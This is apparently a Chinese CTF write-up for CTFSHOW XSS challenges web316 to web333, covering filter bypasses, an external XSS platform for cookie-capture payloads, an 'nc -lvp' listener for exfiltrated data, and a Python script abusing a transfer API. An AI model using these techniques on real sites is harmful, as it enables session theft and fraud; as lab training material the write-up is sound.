CTFSHOW xss篇

web316

xss平台 https://xss.pt/xss.php
创建项目
CTFSHOW xss篇_第1张图片
选择默认模块
CTFSHOW xss篇_第2张图片
一直下一步,然后随便那个代码放到题目输入框中
CTFSHOW xss篇_第3张图片
再刷新下题目
CTFSHOW xss篇_第4张图片

最后看下项目
CTFSHOW xss篇_第5张图片
CTFSHOW xss篇_第6张图片
结束

web317、318、319

317过滤了script
318过滤了img
在那些代码中找没有script和img的然后出不来flag就多试几次,我试的这个是可以的
在这里插入图片描述

web320、321、322

过滤了空格 用tab键代替空格,代码还是用上面的

web323、324、325、326

过滤了iframe

输入后服务器开启监 nc -lvp 5000(bot会每隔一段时间访问输入的内容)
看监听到的内容会有flag
CTFSHOW xss篇_第7张图片

web327

收件人一定得是admin,在内容和发件人里面都填上payload(咱也不知道哪个可以)。
然后payload还是原来xss平台上的就可以,比如下面这种类型的
在这里插入图片描述

web328、329、330、331

用xss平台的超强模块,需要大家自己在网上找一个。(前面给的网站没有这个模块)
CTFSHOW xss篇_第8张图片
就可以得到页面的源码
CTFSHOW xss篇_第9张图片
html解码下就会有flag

下面两个非预期解

web332

随便注册两个用户用其中一个给另外一个转账-999999999就可以购买flag了

web333

可以转账给自己,而且得保证自己最低有1块钱,写个脚本

import requests
import re
import time
x=5
url="http://6e9efd13-ce49-48cd-8eae-53fa92d01651.chall.ctf.show/api/amount.php"
url2="http://6e9efd13-ce49-48cd-8eae-53fa92d01651.chall.ctf.show/api/getFlag.php"
headers={'Cookie':'PHPSESSID=tatvacnnqeihmuic94f1ei7275'}  #自己登录后的sessionid
while True:
	print(x)
	t=x-1
	data={
	'u':'456', #注册的用户名
	'a':str(t)
	}
	r=requests.post(url,headers=headers,data=data)
	print(r.text)
	if(x>10000):
		r2=requests.get(url2,headers=headers)
		print(r2.text)
		break
	x+=t

你可能感兴趣的:(CTFSHOW xss篇)